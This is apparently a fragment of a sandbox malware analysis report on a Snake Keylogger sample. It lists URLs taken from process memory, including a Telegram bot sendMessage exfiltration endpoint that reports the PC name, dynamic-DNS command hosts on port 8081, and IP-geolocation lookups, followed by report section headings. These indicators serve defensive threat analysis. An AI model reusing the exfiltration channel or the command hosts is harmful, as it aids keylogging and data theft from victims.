https://api.telegram.org	msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a	msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	msiexec.exe, 0000000B.00000002.2553419918.000000002153C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 0000000B.00000002.2553419918.0000000021510000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000008.00000002.1673536791.0000000005271000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 0000000B.00000002.2540113983.000000000598A000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 0000000B.00000002.2553419918.000000002150B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 0000000B.00000003.1728327752.0000000005A3E000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000008.00000002.1673536791.0000000005271000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	msiexec.exe, 0000000B.00000002.2553419918.00000000213CC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/	msiexec.exe, 0000000B.00000002.2553419918.0000000021541000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021532000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtabv20-	msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.1676912283.00000000062DA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org?q=	msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 0000000B.00000003.1785131922.0000000005A24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2540113983.00000000059FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2270568666.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.microsoft.	powershell.exe, 00000008.00000002.1682852927.00000000089FF000.00000004.00000020.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en4	msiexec.exe, 0000000B.00000002.2553419918.0000000021510000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	p7wgyD3kbI.exe, p7wgyD3kbI.exe.8.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/l~	msiexec.exe, 0000000B.00000002.2540113983.000000000598A000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/v20	msiexec.exe, 0000000B.00000002.2555779773.0000000022695000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/4	msiexec.exe, 0000000B.00000002.2553419918.0000000021541000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	msiexec.exe, 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.1673536791.00000000053C7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 0000000B.00000002.2553419918.00000000213F6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.000000002143B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 0000000B.00000002.2553419918.00000000213CC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.000000002143B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2553419918.0000000021465000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://gemini.google.com/app?q=	msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.238

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report p7wgyD3kbI.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Windows Analysis Report
p7wgyD3kbI.exe